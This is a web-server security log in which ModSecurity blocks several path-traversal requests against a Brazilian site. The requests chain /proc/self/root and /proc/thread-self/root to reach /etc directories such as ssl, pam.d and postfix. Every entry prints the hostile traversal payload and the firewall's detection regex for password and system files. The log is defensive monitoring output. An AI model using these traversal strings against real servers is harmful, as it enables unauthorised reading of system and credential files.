https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:16.763172 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:35468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpPAkwaGbbGflqUZASUwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:21.041077 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:41444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpQRCii7xarUs8iHYxaQAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:22.145777 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38670] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:29:24.238883 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.243.128:41450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpRLninkcc-iUj5AorYQAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:30.480018 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:41458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpSgkwaGbbGflqUZASVwAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:33.320594 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:52242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpTLninkcc-iUj5AorYwAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:35.370335 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:52252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpTxCii7xarUs8iHYxbwAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:35.601917 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:52252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpTxCii7xarUs8iHYxcAAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:39.544456 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:52268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpU_XLqtnMIWvjpaJmgwAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:41.973317 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.243.128:52182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpVbninkcc-iUj5AorZwAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:49.104658 2026] [proxy_fcgi:error] [pid 10189:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39924] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:29:49.564916 2026] [:error] [pid 8307:tid 140411699963648] [client 74.7.243.128:52196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpXb-FhjpZGs9ba8qx7wAAAwU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:53.299382 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:50948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpYfXLqtnMIWvjpaJmhQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:29:59.423551 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:50950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpZxCii7xarUs8iHYxfgAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:06.343090 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:42064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpbda6ubjKNq_cu4ab4gAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:11.464788 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:33692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpcxCii7xarUs8iHYxkQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:18.139663 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40864] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:30:19.534145 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:34628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpewkwaGbbGflqUZASdQAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:19.747372 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:34628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpewkwaGbbGflqUZASdgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:25.530193 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:34638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpgda6ubjKNq_cu4ab6QAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:34.856687 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:35546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpita6ubjKNq_cu4ab8AAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:41.665440 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:34884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpkda6ubjKNq_cu4ab8wAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:47.064730 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:34898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzplzJ3M9BSuKP7CAbc_AAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:30:49.133810 2026] [proxy_fcgi:error] [pid 8307:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42200] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:30:51.757097 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:39864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzpmwF0L0L-SsrnPo41ugAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
